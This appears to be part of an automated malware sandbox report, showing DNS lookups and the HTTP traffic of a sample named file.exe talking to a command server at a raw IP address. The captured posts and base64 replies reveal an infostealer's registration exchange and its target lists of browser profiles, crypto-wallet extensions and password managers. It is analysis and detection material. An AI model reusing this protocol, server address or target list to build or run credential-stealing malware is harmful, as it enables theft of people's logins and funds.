                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.095834017 CET1.1.1.1192.168.2.60x246aNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.095834017 CET1.1.1.1192.168.2.60x246aNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.107677937 CET1.1.1.1192.168.2.60xbb55No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.108248949 CET1.1.1.1192.168.2.60x10e6No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.587023020 CET1.1.1.1192.168.2.60x170dNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.587023020 CET1.1.1.1192.168.2.60x170dNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.171618938 CET1.1.1.1192.168.2.60x24c0No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.171618938 CET1.1.1.1192.168.2.60x24c0No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.306786060 CET1.1.1.1192.168.2.60x46baNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.306786060 CET1.1.1.1192.168.2.60x46baNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.006419897 CET1.1.1.1192.168.2.60xa824No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.009577990 CET1.1.1.1192.168.2.60x8032No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.009577990 CET1.1.1.1192.168.2.60x8032No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.010724068 CET1.1.1.1192.168.2.60x1de9No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.506710052 CET1.1.1.1192.168.2.60x8887No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.506710052 CET1.1.1.1192.168.2.60x8887No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.649742185.215.113.206805740C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.051945925 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.739574909 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.743864059 CET411OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 209
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.974553108 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Content-Length: 180
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 59 6a 59 31 4e 44 46 68 4d 54 41 34 4d 6d 49 79 4f 44 6b 78 59 6a 4a 6c 59 6a 6c 6c 4f 54 5a 6d 4d 6a 55 7a 4e 6d 59 77 4d 54 6b 7a 4d 47 4a 69 5a 44 46 6d 4d 32 52 6b 4e 57 52 69 4e 6d 51 79 4e 32 51 78 5a 6a 42 6d 59 32 56 6b 4d 47 55 30 59 7a 4d 78 59 6a 49 34 59 7a 64 6b 4f 44 49 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                      Data Ascii: YjY1NDFhMTA4MmIyODkxYjJlYjllOTZmMjUzNmYwMTkzMGJiZDFmM2RkNWRiNmQyN2QxZjBmY2VkMGU0YzMxYjI4YzdkODI0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.976046085 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 268
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"browsers------BKKKEGIDBGHIDGDHDBFH--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195415974 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Content-Length: 2028
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.195749044 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                                                      Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.197906017 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 267
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="message"plugins------JJECGHJDBFIJJJKEHCBF--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419600964 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Content-Length: 7116
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419621944 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                      Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419637918 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                                                      Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419653893 CET672INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                                                      Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419670105 CET1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                                                                                                                                                                                                                                      Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419684887 CET1236INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44
                                                                                                                                                                                                                                                                                      Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHw
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.419702053 CET492INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58
                                                                                                                                                                                                                                                                                      Data Ascii: IFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.431828976 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 268
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="message"fplugins------BAEBGCFIEHCFIDGCAAFB--
